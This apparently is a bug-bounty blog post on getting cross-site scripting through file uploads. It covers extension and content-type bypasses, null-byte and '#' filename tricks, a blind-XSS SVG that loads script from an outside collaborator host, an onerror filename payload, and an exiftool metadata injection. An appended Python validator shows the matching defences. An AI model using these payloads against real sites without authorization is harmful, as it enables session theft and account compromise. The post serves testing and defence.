Hello amazing hunters. Today I want to point out four ways to find XSS in file upload, all of which I found in bug bounty or pentest programs. Let's play this game…
1. XSS via SVG
This is my favorite one: it lets an attacker upload an SVG file that carries an XSS payload. For this scenario I have some recommendations that help you get past common filters.
First of all, upload your file with a .png extension and capture the request in Burp Suite, then change the extension to .svg. This bypasses the client-side extension check, and if the uploader only checks the Content-Type header you bypass that at the same time, since the request still carries the original one.
Second, put the magic bytes of the file type you are claiming at the start of your file.
You can also use some extension bypasses, for example null bytes (XSS.svg%00.png) or characters such as #, ;, ? (XSS.svg#.png).
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>
2. Blind XSS via SVG
All the bypasses from number 1 apply here too; the only difference is the payload. I recommend this one:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<!-- Script linked from the outside -->
<script xlink:href="https://xxxx.burpcollaborator" />
</svg>
3. XSS via Filename
Sometimes the file name is reflected on the page after upload, and you can inject a payload such as XSS, SQL, SSTI or CSTI into the file name before uploading it. Be careful of a few points. Your payload only runs once the file has been uploaded completely. Sometimes the file name fires during the upload, but after you save the page or submit the message the payload is no longer reflected. And check that other users have access to the page where it is reflected, otherwise it is the same story as self-XSS.

'"><img src=x onerror=alert("M7.Arman")>.png
4. XSS via Metadata
Sometimes when you upload a picture, PDF, etc., the file carries metadata that should be stripped during upload. To test this scenario, download this picture and upload it to this site, which decodes and returns its metadata. With exiftool you can inject metadata into your file. After injecting a payload into your picture, upload it to the vulnerable site and see whether it returns an alert for you….

exiftool -Artist='"><img src=1 onerror=alert(document.domain)>' Exif.jpeg

HAPPY HUNTING
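Seen from the defender's side, the four techniques above map onto a few server-side checks. The Python below is an added example written for this page, not code from the post: it rejects file names carrying the null-byte and separator tricks, judges the claimed extension by magic bytes rather than by the Content-Type header, screens SVG for script, event handlers and external or javascript: hrefs, and escapes any file name or metadata field before it is reflected into HTML. All function names, the regex gate and the constructed sample inputs are assumptions of this example.

```python
import html
import re
from typing import Tuple

# Magic bytes for the raster formats this upload endpoint is meant to accept.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# The characters behind the extension tricks (null byte, '#', ';', '?') plus
# path separators. Rejecting the name is safer than trying to normalise it.
FORBIDDEN_NAME_CHARS = re.compile(r"[\x00#;?/\\]|%00")

# SVG markup that can run code: script elements, on* event handlers, and hrefs
# that load from another origin or use javascript:. This regex is a first
# screen, not a sanitiser; an allowlisting XML parser is the real fix.
ACTIVE_SVG = re.compile(
    rb"<script|\son[a-z]+\s*=|(?:xlink:)?href\s*=\s*[\"']?\s*(?:https?:|javascript:)",
    re.IGNORECASE,
)

def is_active_svg(body: bytes) -> bool:
    """True when SVG content carries script, handlers or external/javascript hrefs."""
    return ACTIVE_SVG.search(body) is not None

def check_upload(filename: str, body: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Only the bytes are trusted, never the client's name or header."""
    if FORBIDDEN_NAME_CHARS.search(filename):
        return False, "filename contains a null byte or separator"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext == "svg":
        if is_active_svg(body):
            return False, "svg contains script, event handler or external href"
        # Benign SVG is still HTML-like: serve it as an attachment or from a
        # separate origin so it never renders in the application's context.
        return True, "ok: serve with Content-Disposition: attachment"
    if ext not in MAGIC:
        return False, f"extension .{ext} not allowed"
    if not body.startswith(MAGIC[ext]):
        return False, f"content does not match .{ext} magic bytes"
    return True, "ok"

def reflect(value: str) -> str:
    """Escape a file name or metadata field (EXIF Artist, etc.) before placing it in HTML."""
    return html.escape(value, quote=True)
```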